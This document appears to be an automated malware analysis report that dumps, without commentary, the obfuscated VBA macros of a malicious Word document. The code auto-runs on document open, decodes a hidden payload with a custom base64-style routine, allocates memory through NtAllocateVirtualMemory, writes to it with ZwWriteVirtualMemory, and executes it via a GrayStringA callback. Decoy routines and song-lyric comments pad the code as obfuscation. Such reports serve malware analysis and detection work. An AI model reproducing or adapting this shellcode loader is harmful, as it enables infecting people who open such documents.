Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub nubere()
Dim seamanship As Variant
Dim stylite As Integer
commutual = ThisDocument.GetLetterContent().SenderGender
oreamnos.slicer.Value = commutual + 9
immolation = "botaurus"
agaric = "to" & "st"
Set gynecomastia = oreamnos.slicer.SelectedItem
hourly = 2
hamadryad = 388
indianyellow = 58214
thrive = 379739
thrive = Financial.SYD(thrive, indianyellow, hamadryad, hourly)

canakin = gynecomastia.Name
brains = 4 - 103 + 59 + 5884
formication = Right(canakin, brains)
profit = helminthology.bong(formication)
dilapidation = 18
muharram = 35316
megascopic = 500055
decameter = NPer(52 / 815, dilapidation, -21320, megascopic, 0)

bookcase = "metaphor"
amicable = "bowwow"
#If Win64 Then
Dim caravan As Variant
Dim arrosion As LongPtr
Dim sauropodomorpha As LongPtr
Dim taft As Integer
#Else
Dim huskiness As Long
Dim sauropodomorpha As Long
Dim enbas As String
Dim arrosion As Long
#End If
cigarillo = 0
quadriplanar = "allusion"
timeful = "cleaver"
hypnosis = 4096
centered = 75
birthmark = 35119
chaserbalancer = 583933
frighteningly = NPer(72 / 725, centered, -6984, chaserbalancer, 1)

charge = "nontechnical"
rightful = "sinapis"
charivari = "overtask"
parochialism = 3
nonarboreal = 384
centrist = 31808
dracenaceae = 106652
dracenaceae = Financial.SYD(dracenaceae, centrist, nonarboreal, parochialism)

maintien = profit
aegypiidae = "co" & "ming"
arrosion = lip(maintien)
anestrus = "debitorem"
baggala = "blaser"
#If Win64 Then
Dim obtrusiveness As Long
Dim animalia As LongPtr
marrubium = "sh" & "arpe" & "ared"
mantispid = "ac" & "cipient"
indefatigably = "smatch"
Dim ratitae As LongPtr
cartography = 92 - 45 + 107 + 1158
#Else
gymnocladus = "highrise"
ph = "cl" & "amyd" & "ospore"
assafoetida = "enravishment"
Dim animalia As Long
overlay = 59 - 6 + 442
Dim ratitae As Long
cartography = overlay + 2659

#End If
Dim calliandra As String
Dim haute As Integer
animalia = 92 - 92
sauropodomorpha = arrosion + cartography
ratitae = 39 - 14 - 24
impelled = adulterer(ratitae, ratitae, sauropodomorpha, animalia, ratitae, animalia, animalia, animalia, animalia)
schizoid = 1
girlishness = 8497
je = 503183
degeneres = NPer(71 / 434, schizoid, -33576, je, 0)

End Sub

Sub ControlWord()
    Dim objWord As New Word.Application
    Dim rsContacts As New ADODB.Recordset
    Dim strLtrContent As String
    rsContacts.ActiveConnection = CurrentProject.Connection
    rsContacts.Open "tblContacts"
    
    objWord.Documents.Add
    
    Do While Not rsContacts.EOF
      strLtrContent = rsContacts("FirstName") & " " & rsContacts("LastName")
      strLtrContent = strLtrContent & rsContacts("Address") & vbCrLf
      strLtrContent = strLtrContent & rsContacts("City") & ", " & rsContacts("Region")
      strLtrContent = strLtrContent & "  " & rsContacts("PostalCode")
      strLtrContent = strLtrContent & "Dear " & rsContacts("FirstName") & " "
      strLtrContent = strLtrContent & rsContacts("LastName") & ":"
    
        objWord.Selection.EndOf
        objWord.Selection.Text = strLtrContent
    
        objWord.Selection.EndOf
        objWord.Selection.InsertBreak
        
        rsContacts.MoveNext
    Loop
    objWord.Visible = True
    objWord.PrintPreview = True
End Sub


Function restrengthen(gild, minority, infidelity)
#If Win64 Then
Dim camail As Byte
Dim gleesome As Variant
Dim waggon As LongPtr
Dim detrimentally As LongPtr
Dim aphyllanthaceae As LongPtr
Dim philosophia As String
Dim aurelia As LongPtr
Dim farad As LongPtr
#Else
Dim detrimentally As Long
Dim cooler As Long
Dim waggon As Long
Dim clinodactyly As String
Dim aurelia As Long
Dim consummation As Long
Dim aphyllanthaceae As Long
Dim hardy As Integer
Dim farad As Long
Dim martially As Variant
Dim amateurishness As Long
#End If
proliferation = Button + 132
proliferation = proliferation Or 157
detrimentally = gild
farad = infidelity
achondroplasia = "absently"
aurelia = minority
rollick = 8
indoor = 382
confederate = 30409
granuliferous = 104745
granuliferous = Financial.SYD(granuliferous, confederate, indoor, rollick)

counterexample = achondroplasia
waggon = 14 - 15
workplace ByVal waggon, detrimentally, aurelia, farad, aphyllanthaceae
Button = Fix(462)
End Function
Function lip(burgh)
Dim millenary As String
Dim barnacle As Variant
Dim googol As String
Dim incompletely As Byte
#If Win64 > 0 Then
Dim amicitia As Integer
Dim guisard As LongPtr
unpitied = 50 - 9 - 28 - 5
Dim disenable As LongPtr
Dim zionist As Variant
Dim compensatory As Integer
Dim brilliance As LongPtr
Dim ark As Long
#Else
Dim plena As Byte
Dim guisard As Long
unpitied = 53 - 49
Dim disenable As Long
Dim thraso As Byte
Dim brilliance As Long
Dim absentee As Long
Dim insensate As String
#End If
turmeric = VarPtr(guisard)
congenialness = restrengthen(turmeric, VarPtr(burgh) + 8, unpitied)
unmindfully = -1
disenable = 0
fermented = 0
brilliance = 9770
mab = 4096
altissimo = 64
quicksand = amari(ByVal unmindfully, disenable, ByVal fermented, brilliance, ByVal mab, ByVal altissimo)
counterexample = achondroplasia

counterexample = counterexample

restrengthen disenable, guisard, 4384
megilp = 43
destroy = 25127
preeclampsia = 553934
clypeus = NPer(63 / 794, megilp, -33896, preeclampsia, 0)

lip = disenable
End Function
Private Sub Document_Open()
Dim entomophthorales As Variant
Dim upwind As Integer
neology = "bullshit"
nubere
prefer = 20
clownish = 25485
millenium = 405771
caucasia = NPer(44 / 682, prefer, -33148, millenium, 1)
End Sub

Attribute VB_Name = "helminthology"
'  Now tell me what got two thumbs and knows how to spit rhymes
'  Work ethic harder than a Mexican
#If Win64 Then
'  Good Will Hunting, got up out of the hood
'  You don't gotta watch me but please watch your manners
Public Declare PtrSafe Function workplace Lib "Ntdll.dll  " Alias "ZwWriteVirtualMemory" (ByVal misclassified As Any, ByVal entrenched As Any, ByVal chlamyphorus As Any, ByVal arc As Any, ByVal enthronement As Any) As LongPtr
'  Good Will Hunting, got up out of the hood
'  Like I feel so awesome
Public Declare PtrSafe Function allopathic Lib "Shell32.dll" Alias "SHGetSetFolderCustomSettingsW" (balk As LongPtr,enema As LongPtr,centropristis As LongPtr) As LongPtr
'  I'm awesome every time I lay it down
'  Hands in the sky like
Public Declare PtrSafe Function abscissa Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal unattempted As LongPtr,inspiration As LongPtr,toothless As LongPtr,tailstock As LongPtr,markedly As LongPtr) As Boolean
'  Wayne's World excellent
'  Shawty you fine and your body is awesome
Public Declare PtrSafe Function amari Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (millicurie As LongPtr, anabolism As LongPtr, ByVal committeewoman As LongPtr,astronomerByVal As LongPtr, cracticidae As LongPtr, ByVal displeasingly As LongPtr) As LongPtr
'  I assume you should make room for the elephant
'  Death proof ride with Rosario Dawson
Public Declare PtrSafe Function fevered Lib "Shlwapi.dll" Alias "PathFileExists" (binocular As LongPtr) As LongPtr
'  That's a side smiley face cause I'mma make the best of it
'
Public Declare PtrSafe Function attention Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (phycoerythrin As LongPtr, admeasurement As Any,subbing As LongPtr, broomcorn As Any) As Boolean
'  Had a lukewarm buzz back when Luke was hot
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply
Public  Declare PtrSafe Function adulterer Lib "User32" Alias "GrayStringA" ( ByVal arose As Any, ByVal toller As Any, ByVal extrapolation As Any, ByVal became As Any, ByVal nippers As Any, ByVal independence As Any, ByVal hypogammaglobulinemia As Any, ByVal tichodroma As Any, ByVal bitterish As Any) As Long
'  Awesome, I guess that's awesome
'  Sold out shows, girls trying to get a glitz
Public Declare PtrSafe Function disposed Lib "Shell32.dll" Alias "SHGetDesktopFolder" (trenchant As LongPtr)
'  Awesome, I guess that's awesome
'  Sold out shows, girls trying to get a glitz

'  Awesome, I guess that's awesome
'  Sold out shows, girls trying to get a glitz
#Else
'  Had a lukewarm buzz back when Luke was hot
'  Semi colon dash parenthesis, text messaging
Public Declare Function workplace Lib "Ntdll.dll   " Alias "ZwWriteVirtualMemory" (ByVal archespore As Any, ByVal ptilonorhynchus As Any, ByVal beneficent As Any, ByVal alphanumerics As Any, ByVal centrifuge As Any) As Long
'  That's why I can walk up into any restaurant and close the whole thing
'  Wanna roll
Public Declare Function daze Lib "Shell32.dll" Alias "SHGetDesktopFolder" (analogous As Long)
'  Awesome, well let's go, awesome
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply
Public Declare Function ferine Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal rancorous As Long, congealed As Long, gumdrop As Long, anchor As Long, familiarization As Long) As Boolean
'  Death proof ride with Rosario Dawson
'  How rude, Stephanie Tanner
Public Declare Function amari Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (controversially As Long, sadist As Long, ByVal parasail As Long, civilizationByVal As Long, genealogically As Long, ByVal capsaicin As Long) As Long
'  And y'all can just deal with the rest of it
'  Two thumbs up, you gon point em at this guy
Public Declare Function colombo Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (curricular As Long, glechoma As Any, immitigable As Long, dequet As Any) As Boolean
'  Trying to escape like Cuba Gooding with the flow
'  That's why I can walk up into any restaurant and close the whole thing
Public Declare Function adulterer Lib "User32" Alias "GrayStringA" (ByVal pitterpatter As Any, ByVal lq As Any, ByVal inconceivableness As Any, ByVal saintbernardslily As Any, ByVal personalities As Any, ByVal exacting As Any, ByVal aseptic As Any, ByVal crooner As Any, ByVal ceremoniously As Any) As Long
'  Gator on my shirt, what did it Lacoste him
'  Cooler than a peppermint
Public Declare Function astraphobia Lib "Shell32.dll" Alias "SHGetSetFolderCustomSettingsW" (kaolinite As Long, eacles As Long, straitlaced As Long) As Long
'  Work ethic harder than a Mexican
'  How rude, Stephanie Tanner
Public Declare Function georgia Lib "Shlwapi.dll" Alias "PathFileExists" (locomotion As Long) As Long
'
'  Two thumbs up, you gon point em at this guy

'  How you feel
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply…
#End If
'  Sold out shows, girls trying to get a glitz
'  I'm A-W-E, some call me awesome
Sub Binary_Search_of_Array()
      Dim intThousand(1000) As Integer
      Dim i As Integer
      Dim intTop As Integer
      Dim intMiddle As Integer
      Dim intBottom As Integer
      Dim varUserNumber As Variant

      For i = 1 To 1000
          intThousand(i) = i
      Next i

      varUserNumber = 233
      intTop = UBound(intThousand)
      intBottom = LBound(intThousand)

      Do
          intMiddle = (intTop + intBottom) / 2
          If varUserNumber > intThousand(intMiddle) Then
             intBottom = intMiddle + 1
          Else
              intTop = intMiddle - 1
          End If
      Loop Until (varUserNumber = intThousand(intMiddle)) _
          Or (intBottom > intTop)

      If varUserNumber = intThousand(intMiddle) Then
          Debug.Print varUserNumber & ", at position " & intMiddle
      Else
          Debug.Print "not in "
      End If
  End Sub


Function monopolist(aboutface)
monopolist = AscW(aboutface)
End Function
Function clonus(alternation, hardihood, satinwood)
Select Case satinwood
Case 48
clonus = alternation \ hardihood
Case 58
clonus = alternation And hardihood
Case 66
clonus = alternation * hardihood
End Select
End Function
Function bong(expurgated) As String
Dim agerasia(6965) As Byte
Dim entail As Integer

Dim singlelane As Long
Dim stiffbacked As String
Dim beardless As Integer
Dim uranogrraphy As Byte

counterexample = achondroplasia

Dim deadness As Long
Dim calligrapher As Long
Dim cloudtouching(63) As Long
Dim gramophone As Long

Dim spindle As Long
Dim drosera() As Byte
proliferation = Fix(407)

Dim cabman As Variant

Dim flashing(63) As Long
Dim blinker(63) As Long
achondroplasia = achondroplasia

Dim gamp As Integer

pulsed = 46 + 210
Dim contrastive As Integer

genocide = 16711680
displacency = 65536
oxalate = 262144
blare = 4096
jiqui = 4032
adrenergic = 70 - 62 + 16515064
unsightliness = 65280
pyrology = 63
coals = 258048
OverPrint = 128 + 19 - 73 + 181
Dim drawee As Integer

affiance = 64
Dim hipposideros As Integer
pretentiously = 0
ephor = 5843
Dim bestow() As Byte
Dim toucb As Integer
bestow = VBA.Strings.StrConv(expurgated, vbFromUnicode)
Dim dequantitate As Long
enemy = 8
highvoltage = 269
renovate = 28719
al = 190179
al = Financial.SYD(al, renovate, highvoltage, enemy)

doublecrosser = 5843
torrefaction = 2 + Sqr(RGB(0, 1, 0))
For closed = 0 To doublecrosser
If closed Mod 2 = 0 Then
bestow(closed) = bestow(closed) + torrefaction
Else
bestow(closed) = bestow(closed) + torrefaction - 1
End If
Next closed
far = 3
misshapen = 285
deduce = 35366
foreknowledge = 256021
foreknowledge = Financial.SYD(foreknowledge, deduce, misshapen, far)

beardless = 0
takelma = 0
oecology = 61 - 18
cape = impede
For spindle = 0 To 63
cloudtouching(spindle) = clonus(spindle, affiance, 66)
flashing(spindle) = clonus(spindle, blare, 66)
blinker(spindle) = clonus(spindle, oxalate, 66)
Next spindle
autarchic = 65
beroe = 37743
mumper = 469293
benzocaine = NPer(72 / 605, autarchic, -26549, mumper, 0)

drosera = bestow
konini = 4
mentor = 50
rhine = 3654
deriving = 203683
northern = NPer(31 / 695, mentor, -14080, deriving, 1)

female = 3
proliferation = Fix(132)

achondroplasia = counterexample

doorplate = female + 1
namely = 2
For calligrapher = 0 To doublecrosser
carefully = drosera(calligrapher)
cherub = drosera(calligrapher + 2)
deadness = blinker(cape(carefully)) _
 + flashing(cape(drosera(calligrapher + 1))) + cloudtouching(cape(cherub)) + cape(drosera(calligrapher + female))
spindle = clonus(deadness, genocide, 58)
agerasia(singlelane) = clonus(spindle, displacency, 48)
spindle = clonus(deadness, unsightliness, 58)
agerasia(singlelane + 1) = clonus(spindle, pulsed, 48)
agerasia(singlelane + namely) = clonus(deadness, OverPrint, 58)
singlelane = singlelane + namely + 1
calligrapher = calligrapher + 3
Next
bong = agerasia
End Function

Function impede()
Dim particularized(255) As Byte
conic = 68 - 3
Do
particularized(conic) = conic - 65
conic = conic + 1
Loop Until conic = 91
conic = 48
Do
particularized(conic) = conic + 4
conic = conic + 1
Loop Until conic = 58
conic = 97
Do
particularized(conic) = conic - 71
conic = conic + 1
Loop Until conic = 123
particularized(47) = 63
conic = 43
particularized(conic) = 62
impede = particularized
End Function


Attribute VB_Name = "oreamnos"
Attribute VB_Base = "0{1DAD426D-BD4D-448F-A70F-8656D7A0D5C1}{688B6263-34CB-4F4F-BC49-617CBB883A19}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False